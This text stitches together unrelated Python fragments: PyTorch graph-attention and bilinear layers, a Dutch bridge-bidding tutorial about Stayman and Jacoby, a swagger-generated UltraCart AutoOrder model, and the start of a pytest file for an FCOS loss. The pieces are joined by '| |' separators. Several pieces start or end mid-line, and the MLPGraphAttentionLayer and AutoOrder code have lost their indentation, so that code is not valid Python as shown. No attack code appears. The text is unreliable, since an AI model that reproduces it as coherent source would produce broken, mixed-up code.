        return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'
# TODO: change to batch training
class GraphDiffusedAttentionLayer(nn.Module):
    """GAT-style layer (https://arxiv.org/abs/1710.10903) with an extra
    "diffused" attendee: besides its neighbours, every node can attend to
    the mean of all projected node features. Operates on a single
    (non-batched) graph: ``input`` is (N, in_features), ``adj`` is (N, N).
    """

    def __init__(self, in_features, out_features, dropout, alpha):
        super(GraphDiffusedAttentionLayer, self).__init__()
        self.dropout = dropout
        self.in_features = in_features
        self.out_features = out_features
        self.alpha = alpha
        self.W = nn.Parameter(torch.zeros(size=(in_features, out_features), dtype=torch.float))
        nn.init.xavier_uniform_(self.W.data, gain=1.414)
        self.a_1 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype=torch.float))
        nn.init.xavier_uniform_(self.a_1.data, gain=1.414)
        self.a_2 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype=torch.float))
        nn.init.xavier_uniform_(self.a_2.data, gain=1.414)
        self.leakyrelu = nn.LeakyReLU(self.alpha)

    def forward(self, input, adj):
        projected = torch.matmul(input, self.W)            # (N, out)
        src_score = torch.matmul(projected, self.a_1)      # (N, 1)
        dst_score = torch.matmul(projected, self.a_2)      # (N, 1)
        # Pairwise logits, then mask non-edges with a large negative value.
        pair_logits = self.leakyrelu(src_score + dst_score.t())
        edge_logits = pair_logits.masked_fill(adj <= 0, -9e15)
        # Global "diffused" attendee: the mean projected feature.
        global_feat = torch.mean(projected, dim=0, keepdim=True)   # (1, out)
        candidates = torch.cat([projected, global_feat], 0)        # (N+1, out)
        global_logits = self.leakyrelu(src_score + torch.mm(global_feat, self.a_2))
        all_logits = torch.cat([edge_logits, global_logits], -1)   # (N, N+1)
        weights = F.softmax(all_logits, dim=-1)
        weights = F.dropout(weights, self.dropout, training=self.training)
        return F.elu(torch.mm(weights, candidates))

    def __repr__(self):
        return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'
# TODO:
class Order1GraphMLPAttentionLayer(nn.Module):
    """
    Improved GAT layer, similar to https://arxiv.org/abs/1710.10903, with a
    bilinear (second-order) term a_12 added to the pairwise attention logits.
    Operates on batched graphs: ``feat`` is (B, N, in_features), ``adj`` is
    (B, N, N).

    Bug fix: the original __init__ called ``BiInteractionLayer()`` without its
    required arguments (TypeError on construction) and ``_attention``
    referenced ``self.W``, ``self.a_1``, ``self.a_2`` and ``self.a_12`` that
    were never defined, so the layer could neither be built nor run. The
    missing parameters are now defined exactly as in the sibling
    ``Order1GraphAttentionLayer``, and the broken instantiation is removed.

    :param in_features: input feature dimension
    :param out_features: output feature dimension
    :param dropout: dropout probability applied to the attention weights
    :param alpha: negative slope of the LeakyReLU on the attention logits
    :param activation: optional nonlinearity applied to the output
    :param num_basis: unused; kept for signature compatibility
    """

    def __init__(self, in_features, out_features, dropout, alpha, activation, num_basis=5):
        super(Order1GraphMLPAttentionLayer, self).__init__()
        self.dropout = dropout
        self.in_features = in_features
        self.out_features = out_features
        self.alpha = alpha
        # Linear terms used by _update (skip path + aggregated path).
        self.W_1 = nn.Parameter(torch.zeros(size=(in_features, out_features), ))
        nn.init.xavier_uniform_(self.W_1.data, gain=1.414)
        self.W_2 = nn.Parameter(torch.zeros(size=(in_features, out_features), ))
        nn.init.xavier_uniform_(self.W_2.data, gain=1.414)
        # Parameters required by _attention (mirrors Order1GraphAttentionLayer).
        self.W = nn.Parameter(torch.zeros(size=(in_features, out_features), ))
        nn.init.xavier_uniform_(self.W.data, gain=1.414)
        self.a_1 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype=torch.float))
        nn.init.xavier_uniform_(self.a_1.data, gain=1.414)
        self.a_2 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype=torch.float))
        nn.init.xavier_uniform_(self.a_2.data, gain=1.414)
        self.a_12 = nn.Parameter(torch.zeros(size=(out_features, out_features)))
        bound = 1 / math.sqrt(self.a_12.size(0))
        nn.init.uniform_(self.a_12, -bound, bound)
        self.leakyrelu = nn.LeakyReLU(self.alpha)
        self.activation = activation

    def _attention(self, feat, adj):
        """Masked softmax attention from first-order plus bilinear logits."""
        h = torch.matmul(feat, self.W)
        Ax = torch.matmul(h, self.a_1)                    # (B, N, 1)
        Ay = torch.matmul(h, self.a_2)                    # (B, N, 1)
        # Second-order interaction term: h a_12 h^T -> (B, N, N).
        A_xy_1 = torch.matmul(h, self.a_12)
        A_xy = torch.matmul(A_xy_1, h.permute(0, 2, 1))
        Ax_prime = Ax.permute(0, 2, 1)                    # (B, 1, N)
        Ay_prime = Ay
        logits = Ax_prime + Ay_prime + A_xy
        e = self.leakyrelu(logits)
        # Mask non-edges with a large negative value before the softmax.
        zero_vec = -9e15 * e.new_tensor([1., ])
        e = torch.where(adj > 0, e, zero_vec)
        attention = F.softmax(e, dim=-1)
        attention = F.dropout(attention, self.dropout, training=self.training)
        return attention

    def _aggregate(self, feat, adj):
        """Aggregate the raw (unprojected) features with attention weights."""
        attention = self._attention(feat, adj)
        h_prime = torch.matmul(attention, feat)
        return h_prime

    def _update(self, feat, feat_agg):
        """Combine skip path (W_1) and aggregated path (W_2), then activate."""
        h_1 = torch.matmul(feat, self.W_1)
        h_2 = torch.matmul(feat_agg, self.W_2)
        h_out = h_1 + h_2
        if not self.activation:
            return h_out
        return self.activation(h_out)

    def forward(self, feat, adj):
        feat_agg = self._aggregate(feat, adj)
        return self._update(feat, feat_agg)

    def extra_repr(self):
        return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'
class Order1GraphAttentionLayer(nn.Module):
    """GAT-style layer (https://arxiv.org/abs/1710.10903) over batched graphs.

    Attention logits use only the first-order terms a_1^T Wh_i + a_2^T Wh_j;
    the bilinear term was disabled by the author (see original commented-out
    code). NOTE(review): W_1, W_2, a_12 and W_xy are initialised but unused
    by the current forward path; they are kept to preserve the state_dict
    layout and RNG consumption order.
    """

    def __init__(self, in_features, out_features, dropout, alpha, activation, num_basis=5):
        super(Order1GraphAttentionLayer, self).__init__()
        self.dropout = dropout
        self.in_features = in_features
        self.out_features = out_features
        self.alpha = alpha
        self.W = nn.Parameter(torch.zeros(size=(in_features, out_features), ))
        nn.init.xavier_uniform_(self.W.data, gain=1.414)
        self.W_1 = nn.Parameter(torch.zeros(size=(in_features, out_features), ))
        nn.init.xavier_uniform_(self.W_1.data, gain=1.414)
        self.W_2 = nn.Parameter(torch.zeros(size=(in_features, out_features), ))
        nn.init.xavier_uniform_(self.W_2.data, gain=1.414)
        self.a_1 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype=torch.float))
        nn.init.xavier_uniform_(self.a_1.data, gain=1.414)
        self.a_2 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype=torch.float))
        nn.init.xavier_uniform_(self.a_2.data, gain=1.414)
        self.a_12 = nn.Parameter(torch.zeros(size=(out_features, out_features)))
        bound = 1 / math.sqrt(self.a_12.size(0))
        nn.init.uniform_(self.a_12, -bound, bound)
        self.W_xy = nn.Parameter(torch.zeros(size=(out_features, 1)))
        nn.init.xavier_uniform_(self.W_xy.data, gain=1.414)
        self.leakyrelu = nn.LeakyReLU(self.alpha)
        self.activation = activation

    def _attention(self, feat, adj):
        """Masked softmax attention from first-order pairwise logits."""
        projected = torch.matmul(feat, self.W)
        row_term = torch.matmul(projected, self.a_1).permute(0, 2, 1)  # (B, 1, N)
        col_term = torch.matmul(projected, self.a_2)                   # (B, N, 1)
        scores = self.leakyrelu(row_term + col_term)
        # Suppress non-edges with a large negative value before the softmax.
        scores = scores.masked_fill(adj <= 0, -9e15)
        weights = F.softmax(scores, dim=-1)
        return F.dropout(weights, self.dropout, training=self.training)

    def _aggregate(self, feat, adj):
        """Aggregate the raw (unprojected) features with attention weights."""
        return torch.matmul(self._attention(feat, adj), feat)

    def _update(self, feat, feat_agg):
        """Project the aggregated features and apply the optional activation."""
        out = torch.matmul(feat_agg, self.W)
        return self.activation(out) if self.activation else out

    def forward(self, feat, adj):
        return self._update(feat, self._aggregate(feat, adj))

    def extra_repr(self):
        return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'
class SVDBilinear(nn.Module):
    """Bilinear layer whose weight is factored like a pseudo-SVD.

    For each output channel o the full bilinear weight is reconstructed as
    ``U[o] @ diag(s[o]) @ V[o]`` with ``num_basis`` components, which needs
    far fewer parameters than a dense (out, in1, in2) tensor.
    """

    def __init__(self, num_basis, in1_features, in2_features, out_features):
        super(SVDBilinear, self).__init__()
        self.num_basis = num_basis
        self.in1_features = in1_features
        self.in2_features = in2_features
        self.out_features = out_features
        # U, V and the per-channel singular values s.
        self.left_singular = nn.Parameter(torch.Tensor(out_features, in1_features, num_basis))
        self.right_singular = nn.Parameter(torch.Tensor(out_features, num_basis, in2_features))
        self.diag = nn.Parameter(torch.Tensor(out_features, 1, num_basis))
        self.reset_parameter()

    def reset_parameter(self):
        init.xavier_uniform_(self.left_singular, gain=1.414)
        init.xavier_uniform_(self.right_singular, gain=1.414)
        init.normal_(self.diag, 0, 1 / math.sqrt(self.diag.size(-1)))

    def forward(self, in1, in2):
        # Rebuild the dense bilinear weight: (U * s) @ V -> (out, in1, in2).
        scaled_left = self.left_singular * self.diag
        weight = torch.matmul(scaled_left, self.right_singular)
        return F.bilinear(in1, in2, weight=weight)

    def __repr__(self):
        return "SVDBilinear Layer: in1_features={}, in2_features={}, out_features={}, num_basis={}".format(
            self.in1_features, self.in2_features, self.out_features, self.num_basis
        )
class EmbedBilinear(nn.Module):
    """Bilinear module that first embeds both inputs into a smaller space.

    Projecting each input down to ``embed_size`` before the bilinear product
    reduces the bilinear weight from (out, in1, in2) to
    (out, embed_size, embed_size).
    """

    def __init__(self, embed_size, in1_features, in2_features, out_features, bias=False):
        super(EmbedBilinear, self).__init__()
        self.embed_size = embed_size
        self.in1_features = in1_features
        self.in2_features = in2_features
        self.out_features = out_features
        self.use_bias = bias
        # Dimension-reducing projections, one per input side.
        self.left_embed_layer = nn.Linear(in_features=in1_features, out_features=embed_size, bias=bias)
        self.right_embed_layer = nn.Linear(in_features=in2_features, out_features=embed_size, bias=bias)
        self.Bilinear = nn.Bilinear(in1_features=embed_size, in2_features=embed_size, out_features=out_features, bias=bias)
        self.reset_parameters()

    def reset_parameters(self):
        self.left_embed_layer.reset_parameters()
        self.right_embed_layer.reset_parameters()
        self.Bilinear.reset_parameters()

    def forward(self, in1, in2):
        # Embed both sides, then take their bilinear interaction.
        return self.Bilinear(self.left_embed_layer(in1), self.right_embed_layer(in2))

    def __repr__(self):
        return "EmbedBilinear Layer: in1_features={}, in2_features={}, out_features={}, embed_size={}".format(
            self.in1_features, self.in2_features, self.out_features, self.embed_size
        )
class BiInteractionLayer(nn.Module):
    """Two-input interaction block: embed each input, concatenate, and pass
    the result through an MLP.

    :param in1_features: feature size of the first input
    :param in2_features: feature size of the second input
    :param out_features: output feature size
    :param embed_size: size each input is embedded to before concatenation
    :param intermediate_size: optional list of hidden sizes for the MLP;
        ``None``/empty means a single linear layer
    :param activation: nonlinearity applied after every linear layer
    :param use_bias: recorded for repr only; all linears use bias=True
    """

    def __init__(self, in1_features, in2_features, out_features, embed_size,
                 intermediate_size=None, activation=F.relu, use_bias=True):
        super(BiInteractionLayer, self).__init__()
        self.in1_features = in1_features
        self.in2_features = in2_features
        self.out_features = out_features
        self.embed_size = embed_size
        self.embed_layer_1 = nn.Linear(in1_features, embed_size, bias=True)
        self.embed_layer_2 = nn.Linear(in2_features, embed_size, bias=True)
        self.activation = activation
        self.bias = use_bias
        # MLP sizes: concatenated embedding -> hidden layers -> output.
        sizes = [embed_size * 2] + list(intermediate_size or []) + [out_features]
        self.interaction = nn.ModuleList(
            nn.Linear(fan_in, fan_out, bias=True)
            for fan_in, fan_out in zip(sizes[:-1], sizes[1:])
        )
        self.num_layers = len(self.interaction)
        self.reset_parameters()

    def reset_parameters(self):
        self.embed_layer_1.reset_parameters()
        self.embed_layer_2.reset_parameters()
        for layer in self.interaction:
            layer.reset_parameters()

    def forward(self, in1, in2):
        left = self.activation(self.embed_layer_1(in1))
        right = self.activation(self.embed_layer_2(in2))
        hidden = torch.cat([left, right], -1)
        for fc in self.interaction:
            hidden = self.activation(fc(hidden))
        return hidden

    def extra_repr(self):
        return "Multi-layer perception: in1_features: %s, in2_features: %s, out_features: %s, bias: %s, layers: %s, activation: %s" \
            % (self.in1_features, self.in2_features, self.out_features, self.bias, self.num_layers, self.activation)
class MLPGraphAttentionLayer(BaseGraphAttentionLayer):
"""
Improved GAT layer, similar to https://arxiv.org/abs/1710.10903
"""
def __init__(self, in_features, out_features, dropout, alpha, activation, num_basis = 5):
super(MLPGraphAttentionLayer, self).__init__()
self.dropout = dropout
self.in_features = in_features
self.out_features = out_features
self.alpha | |
u ook niet doubleren.
Dus als u geen lange klaverkaart heeft, of niet genoeg honneurs is het soms beter gewoon te passen.
'''
if state == 'StaymanPa2SAminMulti':
uitleg = '''
U heeft zowel een vierkaart harten als een vierkaart schoppen.
Met Stayman vroeg uw partner naar uw hoge kleuren, daar antwoordde u 2♥ op, omdat u uw partner wilde laten weten dat u mogelijk ook nog een schoppen kaart kon hebben naast de minimaal 4 harten.
Dus nu uw partner met 2SA aangeeft dat hij / zij geen harten heeft, en dus schoppen, weet u dat jullie een fit hebben in de schoppen.
En doordat uw partner 2SA heeft geboden weet u dat uw partner 8/9 punten heeft en dus net niet genoeg voor de manch.
Uw partner vraagt nu aan u of u genoeg heeft om naar de manch te gaan, maar omdat u maar 15 punten heeft is dat net niet genoeg voor de manch.
Dus u biedt 3♠.
'''
if state == 'StaymanPa2SAmaxMulti':
uitleg = '''
U heeft zowel een vierkaart harten als een vierkaart schoppen.
Met Stayman vroeg uw partner naar uw hoge kleuren, waarop u 2♥ antwoordde, omdat u uw partner wilde laten weten dat u mogelijk ook nog een schoppen kaart kon hebben naast de minimaal 4 harten.
Dus nu uw partner met 2SA aangeeft dat hij / zij geen harten heeft, en dus schoppen, weet u dat jullie een fit hebben in de schoppen.
En doordat uw partner 2SA heeft geboden weet u dat uw partner 8/9 punten heeft en dus net niet genoeg voor de manch.
Uw partner vraagt nu aan u of u genoeg heeft om naar de manch te gaan, u heeft genoeg punten om de manch te halen.
Dus u biedt 4♠.
'''
if state == 'StaymanPa2SA':
uitleg = '''
Uw partner verteld u dat hij / zij een andere vierkaart dan u heeft, want met 2♣ beloofde uw partner een vierkaart hoog, maar hij / zij ontkent uw vierkaart.
Wat betekend dat uw partner de andere kleur heeft. Met 2SA verteld uw partner nog iets, namelijk dat hij / zij 8/9 punten bezit.
En vraagt aan u of u genoeg punten heeft om de manch te halen. Daarom biedt u de manch met een maximale hand en past u met een minimale.
'''
if state == 'StaymanPa3SAMulti':
uitleg = '''
U heeft zowel een vierkaart harten als een vierkaart schoppen.
Met Stayman vroeg uw partner naar uw hoge kleuren, waarop u 2♥ antwoordde, omdat u uw partner wilde laten weten dat u mogelijk ook nog een schoppen kaart kon hebben naast de minimaal 4 harten.
Dus nu uw partner met 3SA aangeeft dat hij / zij geen harten heeft, en dus schoppen, weet u dat jullie een fit hebben.
En doordat uw partner 3SA heeft geboden weet u ook dat de manch erin zit.
Dus u biedt 4♠, want een manch in de hoge kleuren is beter dan een manch in sans.
'''
if state == 'OpJacoby':
uitleg = '''
Uw tegenstanders bieden Jacoby en zijn op zoek naar het juiste contract voor wat ze kunnen spelen,
de kans dat u en uw partner een contract gaan maken is dan erg klein,
dat betekent niet dat u geen informatie aan uw partner kunt geven.
Uw tegenstander heeft Jacoby geboden, daarmee geeft hij niet de geboden kleur aan,
dus dit is een ideaal moment om veilig een doublet tussen te bieden,
aangezien de 1SA-openaar nooit gaat passen, en het doublet dus geen waarde heeft.
Dus als u een goede kaart in de geboden kleur heeft is dit de ideale situatie om dat aan uw partner te laten weten,
door te doubleren.
'''
if state == 'AnswerJacoby':
uitleg = '''
Uw partner weet dat uw laagste kaart een doubleton is, en dat u 15-17 punten heeft.
Samen 8 kaarten heet een fit (met een fit kunt u in die kleur spelen), dus minimaal 2 + 5 is bijna een fit.
Als jullie een (bijna) fit hebben kunnen jullie beter in die kleur spelen dan het risico van SA te nemen,
daarom is Jacoby bedacht, en daarom kan uw partner dit ook al bieden vanaf 0 punten,
met de voorwaarde van een vijfkaart in een van de hoge kleuren, ♥ en ♠.
Omdat u liever heeft dat de tegenstanders de minste punten zien, en dus de minste honneurs,
heeft u het liefst dat de 1SA openaar speelt,
daar heeft de heer Jacoby iets op bedacht, als uw partner, de kleur onder de kleur die hij / zij eigenlijk zou willen bieden bied,
kan u daarna de kleur boven de kleur van uw partner bieden, en is het spel in uw hand, die van de openaar.
'''
if state == 'AfterTransferPass':
uitleg = '''
Toen u Jacoby bood deed u dat met de intentie om uw partner uw langste kleur te laten weten.
Als u dat gedaan heeft en niets meer te vertellen heeft aan uw partner kunt u gerust passen.
'''
if state == 'AfterTransder2SA':
uitleg = '''
Toen u Jacoby bood deed u dat met de intentie om uw partner uw langste kleur te laten weten.
Maar u heeft 8/9 punten, wat betekend dat er mogelijk nog een manch in zit!
En als er mogelijk nog een manch in zit mag u dat niet laten varen,
dus moet u aan uw partner "overleggen" of hij denkt dat er een manch in zit.
Dat doet u door 2Sa te bieden.
'''
if state == 'AfterTransfer3SA':
uitleg = '''
U partner bood als eerste 1SA dat betekent dat hij / zij 15-17 punten heeft.
U wilde aan uw partner laten weten dat u een vijfkaart had, wat een goed iets is maar nu moet u ook laten weten hoeveel punten u heeft.
U heeft 10 punten, en uw partner minimaal 15.
10 + 15 = 25
25 punten is genoeg voor de manch, nu is nog de vraag of u liever een manch in 3SA heeft of in uw kleur.
Uw partner weet dat u een vijfkaart heeft in die kleur dus het heeft geen zin die kleur nog een keer te bieden.
Daarom kunt u 3SA bieden, als uw partner wel een driekaart in uw kleur heeft en jullie dus een fit hebben,
bied uw partner nog de manch in die kleur.
Heeft uw partner dit niet, dan past uw partner.
'''
if state == 'AfterTransferManchinClr':
uitleg = '''
Uw partner opende 1SA, wat betekent dat uw partner 15-17 punten heeft,
maar het betekent ook dat uw partners laagste kleur minimaal 2 kaarten bevat.
Dus als u een zeskaart heeft, heeft u altijd fit, nu heeft u eerst net<NAME> geboden om aan te geven dat u een vijfkaart heeft.
Maar u heeft geen vijfkaart, u heeft een zeskaart, en uw partner weet dat nog niet.
Uw partner heeft ook 15 punten, wat betekend dat als u meer dan 10 punten heeft, jullie samen 25 punten hebben.
En 25 is genoeg voor de manch.
Dus jullie hebben een fit om een kleur in te spelen, en jullie hebben genoeg punten om de manch te spelen.
Dan kunt u dus gewoon de manch bieden.
'''
if state == 'AfterTransferInviteinClr':
uitleg = '''
Uw partner opende 1SA, wat betekend dat uw partner 15-17 punten heeft,
maar het betekent ook dat uw partners laagste kleur minimaal 2 kaarten bevat.
Dus als u een zeskaart heeft, heeft u altijd fit, nu heeft u eerst net<NAME> geboden om aan te geven dat u een vijfkaart heeft.
Maar u heeft geen vijfkaart, u heeft een zeskaart, en uw partner weet dat nog niet.
| |
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AutoOrder(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'auto_order_code': 'str',
'auto_order_oid': 'int',
'cancel_after_next_x_orders': 'int',
'cancel_downgrade': 'bool',
'cancel_upgrade': 'bool',
'canceled_by_user': 'str',
'canceled_dts': 'str',
'completed': 'bool',
'credit_card_attempt': 'int',
'disabled_dts': 'str',
'enabled': 'bool',
'failure_reason': 'str',
'items': 'list[AutoOrderItem]',
'next_attempt': 'str',
'original_order': 'Order',
'original_order_id': 'str',
'override_affiliate_id': 'int',
'rebill_orders': 'list[Order]',
'rotating_transaction_gateway_code': 'str',
'status': 'str'
}
attribute_map = {
'auto_order_code': 'auto_order_code',
'auto_order_oid': 'auto_order_oid',
'cancel_after_next_x_orders': 'cancel_after_next_x_orders',
'cancel_downgrade': 'cancel_downgrade',
'cancel_upgrade': 'cancel_upgrade',
'canceled_by_user': 'canceled_by_user',
'canceled_dts': 'canceled_dts',
'completed': 'completed',
'credit_card_attempt': 'credit_card_attempt',
'disabled_dts': 'disabled_dts',
'enabled': 'enabled',
'failure_reason': 'failure_reason',
'items': 'items',
'next_attempt': 'next_attempt',
'original_order': 'original_order',
'original_order_id': 'original_order_id',
'override_affiliate_id': 'override_affiliate_id',
'rebill_orders': 'rebill_orders',
'rotating_transaction_gateway_code': 'rotating_transaction_gateway_code',
'status': 'status'
}
def __init__(self, auto_order_code=None, auto_order_oid=None, cancel_after_next_x_orders=None, cancel_downgrade=None, cancel_upgrade=None, canceled_by_user=None, canceled_dts=None, completed=None, credit_card_attempt=None, disabled_dts=None, enabled=None, failure_reason=None, items=None, next_attempt=None, original_order=None, original_order_id=None, override_affiliate_id=None, rebill_orders=None, rotating_transaction_gateway_code=None, status=None): # noqa: E501
"""AutoOrder - a model defined in Swagger""" # noqa: E501
self._auto_order_code = None
self._auto_order_oid = None
self._cancel_after_next_x_orders = None
self._cancel_downgrade = None
self._cancel_upgrade = None
self._canceled_by_user = None
self._canceled_dts = None
self._completed = None
self._credit_card_attempt = None
self._disabled_dts = None
self._enabled = None
self._failure_reason = None
self._items = None
self._next_attempt = None
self._original_order = None
self._original_order_id = None
self._override_affiliate_id = None
self._rebill_orders = None
self._rotating_transaction_gateway_code = None
self._status = None
self.discriminator = None
if auto_order_code is not None:
self.auto_order_code = auto_order_code
if auto_order_oid is not None:
self.auto_order_oid = auto_order_oid
if cancel_after_next_x_orders is not None:
self.cancel_after_next_x_orders = cancel_after_next_x_orders
if cancel_downgrade is not None:
self.cancel_downgrade = cancel_downgrade
if cancel_upgrade is not None:
self.cancel_upgrade = cancel_upgrade
if canceled_by_user is not None:
self.canceled_by_user = canceled_by_user
if canceled_dts is not None:
self.canceled_dts = canceled_dts
if completed is not None:
self.completed = completed
if credit_card_attempt is not None:
self.credit_card_attempt = credit_card_attempt
if disabled_dts is not None:
self.disabled_dts = disabled_dts
if enabled is not None:
self.enabled = enabled
if failure_reason is not None:
self.failure_reason = failure_reason
if items is not None:
self.items = items
if next_attempt is not None:
self.next_attempt = next_attempt
if original_order is not None:
self.original_order = original_order
if original_order_id is not None:
self.original_order_id = original_order_id
if override_affiliate_id is not None:
self.override_affiliate_id = override_affiliate_id
if rebill_orders is not None:
self.rebill_orders = rebill_orders
if rotating_transaction_gateway_code is not None:
self.rotating_transaction_gateway_code = rotating_transaction_gateway_code
if status is not None:
self.status = status
@property
def auto_order_code(self):
"""Gets the auto_order_code of this AutoOrder. # noqa: E501
Unique code assigned to this auto order # noqa: E501
:return: The auto_order_code of this AutoOrder. # noqa: E501
:rtype: str
"""
return self._auto_order_code
@auto_order_code.setter
def auto_order_code(self, auto_order_code):
"""Sets the auto_order_code of this AutoOrder.
Unique code assigned to this auto order # noqa: E501
:param auto_order_code: The auto_order_code of this AutoOrder. # noqa: E501
:type: str
"""
self._auto_order_code = auto_order_code
@property
def auto_order_oid(self):
"""Gets the auto_order_oid of this AutoOrder. # noqa: E501
Auto order object identifier # noqa: E501
:return: The auto_order_oid of this AutoOrder. # noqa: E501
:rtype: int
"""
return self._auto_order_oid
@auto_order_oid.setter
def auto_order_oid(self, auto_order_oid):
"""Sets the auto_order_oid of this AutoOrder.
Auto order object identifier # noqa: E501
:param auto_order_oid: The auto_order_oid of this AutoOrder. # noqa: E501
:type: int
"""
self._auto_order_oid = auto_order_oid
@property
def cancel_after_next_x_orders(self):
"""Gets the cancel_after_next_x_orders of this AutoOrder. # noqa: E501
Cancel this auto order after X additional rebills # noqa: E501
:return: The cancel_after_next_x_orders of this AutoOrder. # noqa: E501
:rtype: int
"""
return self._cancel_after_next_x_orders
@cancel_after_next_x_orders.setter
def cancel_after_next_x_orders(self, cancel_after_next_x_orders):
"""Sets the cancel_after_next_x_orders of this AutoOrder.
Cancel this auto order after X additional rebills # noqa: E501
:param cancel_after_next_x_orders: The cancel_after_next_x_orders of this AutoOrder. # noqa: E501
:type: int
"""
self._cancel_after_next_x_orders = cancel_after_next_x_orders
@property
def cancel_downgrade(self):
"""Gets the cancel_downgrade of this AutoOrder. # noqa: E501
True if the auto order was canceled because the customer purchased a downgrade item # noqa: E501
:return: The cancel_downgrade of this AutoOrder. # noqa: E501
:rtype: bool
"""
return self._cancel_downgrade
@cancel_downgrade.setter
def cancel_downgrade(self, cancel_downgrade):
"""Sets the cancel_downgrade of this AutoOrder.
True if the auto order was canceled because the customer purchased a downgrade item # noqa: E501
:param cancel_downgrade: The cancel_downgrade of this AutoOrder. # noqa: E501
:type: bool
"""
self._cancel_downgrade = cancel_downgrade
@property
def cancel_upgrade(self):
"""Gets the cancel_upgrade of this AutoOrder. # noqa: E501
True if the auto order was canceled because the customer purchased an upgrade item # noqa: E501
:return: The cancel_upgrade of this AutoOrder. # noqa: E501
:rtype: bool
"""
return self._cancel_upgrade
@cancel_upgrade.setter
def cancel_upgrade(self, cancel_upgrade):
"""Sets the cancel_upgrade of this AutoOrder.
True if the auto order was canceled because the customer purchased an upgrade item # noqa: E501
:param cancel_upgrade: The cancel_upgrade of this AutoOrder. # noqa: E501
:type: bool
"""
self._cancel_upgrade = cancel_upgrade
@property
def canceled_by_user(self):
"""Gets the canceled_by_user of this AutoOrder. # noqa: E501
The user that canceled the auto order # noqa: E501
:return: The canceled_by_user of this AutoOrder. # noqa: E501
:rtype: str
"""
return self._canceled_by_user
@canceled_by_user.setter
def canceled_by_user(self, canceled_by_user):
"""Sets the canceled_by_user of this AutoOrder.
The user that canceled the auto order # noqa: E501
:param canceled_by_user: The canceled_by_user of this AutoOrder. # noqa: E501
:type: str
"""
self._canceled_by_user = canceled_by_user
@property
def canceled_dts(self):
"""Gets the canceled_dts of this AutoOrder. # noqa: E501
The date/time that the auto order was canceled # noqa: E501
:return: The canceled_dts of this AutoOrder. # noqa: E501
:rtype: str
"""
return self._canceled_dts
@canceled_dts.setter
def canceled_dts(self, canceled_dts):
"""Sets the canceled_dts of this AutoOrder.
The date/time that the auto order was canceled # noqa: E501
:param canceled_dts: The canceled_dts of this AutoOrder. # noqa: E501
:type: str
"""
self._canceled_dts = canceled_dts
@property
def completed(self):
"""Gets the completed of this AutoOrder. # noqa: E501
True if the auto order ran successfully to completion # noqa: E501
:return: The completed of this AutoOrder. # noqa: E501
:rtype: bool
"""
return self._completed
@completed.setter
def completed(self, completed):
"""Sets the completed of this AutoOrder.
True if the auto order ran successfully to completion # noqa: E501
:param completed: The completed of this AutoOrder. # noqa: E501
:type: bool
"""
self._completed = completed
@property
def credit_card_attempt(self):
"""Gets the credit_card_attempt of this AutoOrder. # noqa: E501
The number of credit card attempts that have taken place # noqa: E501
:return: The credit_card_attempt of this AutoOrder. # noqa: E501
:rtype: int
"""
return self._credit_card_attempt
@credit_card_attempt.setter
def credit_card_attempt(self, credit_card_attempt):
"""Sets the credit_card_attempt of this AutoOrder.
The number of credit card attempts that have taken place # noqa: E501
:param credit_card_attempt: The credit_card_attempt of this AutoOrder. # noqa: E501
:type: int
"""
self._credit_card_attempt = credit_card_attempt
@property
def disabled_dts(self):
"""Gets the disabled_dts of this AutoOrder. # noqa: E501
The date/time the auto order was disabled due to failed rebills # noqa: E501
:return: The disabled_dts of this AutoOrder. # noqa: E501
:rtype: str
"""
return self._disabled_dts
@disabled_dts.setter
def disabled_dts(self, disabled_dts):
"""Sets the disabled_dts of this AutoOrder.
The date/time the auto order was disabled due to failed rebills # noqa: E501
:param disabled_dts: The disabled_dts of this AutoOrder. # noqa: E501
:type: str
"""
self._disabled_dts = disabled_dts
@property
def enabled(self):
"""Gets the enabled of this AutoOrder. # noqa: E501
True if this auto order is enabled # noqa: E501
:return: The enabled of this AutoOrder. # noqa: E501
:rtype: bool
"""
return self._enabled
@enabled.setter
def enabled(self, enabled):
"""Sets the enabled of this AutoOrder.
True if this auto order is enabled # noqa: E501
:param enabled: The enabled of this AutoOrder. # noqa: E501
:type: bool
"""
self._enabled = enabled
@property
def failure_reason(self):
"""Gets the failure_reason of this AutoOrder. # noqa: E501
The reason this auto order | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from pathlib import Path
from typing import Optional
import pytest
import torch
import torch.nn.functional as F
from torch import Tensor
from combustion.nn import FCOSDecoder, FCOSLoss
from combustion.util import alpha_blend, apply_colormap
from combustion.vision import visualize_bbox
class TestFCOSLoss:
@pytest.mark.parametrize(
    "height,width,stride,indexing",
    [
        pytest.param(8, 8, 1, "hw"),
        pytest.param(8, 8, 2, "hw"),
        pytest.param(10, 8, 2, "hw"),
        pytest.param(10, 8, 2, "xy"),
    ],
)
def test_create_coordinate_grid(self, height, width, stride, indexing):
    """The grid holds per-cell center coordinates: a channel dim of size 2,
    spatial dims (height, width), first cell at stride/2 and last cell at
    size * stride - stride/2, with channel order controlled by `indexing`."""
    grid = FCOSLoss.coordinate_grid(height, width, stride, indexing)
    assert grid.shape[0] == 2
    assert tuple(grid.shape[-2:]) == (height, width)
    half_stride = stride / 2
    first_cell = torch.tensor([half_stride, half_stride])
    assert torch.allclose(grid[:, 0, 0], first_cell)
    last_cell = torch.tensor([width, height], dtype=torch.float) * stride - half_stride
    if indexing == "hw":
        last_cell = last_cell.roll(1)
    assert torch.allclose(grid[:, -1, -1], last_cell)
@pytest.mark.parametrize("inclusive", ["lower", "upper", "both"])
